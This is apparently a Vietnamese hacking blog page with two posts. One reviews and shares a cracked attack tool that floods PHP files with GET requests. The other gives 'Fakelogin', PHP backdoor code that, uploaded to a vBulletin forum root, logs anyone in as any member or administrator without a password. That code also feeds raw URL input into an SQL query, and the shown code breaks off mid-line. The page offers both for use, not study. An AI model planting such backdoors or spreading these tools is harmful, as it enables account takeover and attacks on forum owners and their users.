Nhận xét:
Đây là tool khá cùi đc thổi phồng khá nhiều, cơ chế check quá đơn giản.
Các tấn công nó sẽ gửi request GET như hình dưới tới các file php để attack.Có thể xếp vào dạng hostboot.
Tool share trong NBT 100% clean anh em nhé !
B1/ check lic
Giao diện tool
Request tới file php để attack
Nội dung request
hướng dẫn sử dụng : Bản này để anh em nghịch xem nó cùi tn thôi. có thể con gà code ra cái cùi bắp này sẽ del hết shell attack
Dùng tool crack trc khi dùng.dùng xong kiểm tra lại file host nhé.Tool crack chỉ sửa file host thôi.
Anh em leck giữ bq cho mình nhé lần sau còn share tiếp.
Download
Fakelogin - Đăng nhập vào forum VBB không cần pass
Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass Quote: <?php if (isset($_GET['bd'])) { define('THIS_SCRIPT', 'login'); require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'"); if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_u...
0 nhận xét:
Đăng nhận xét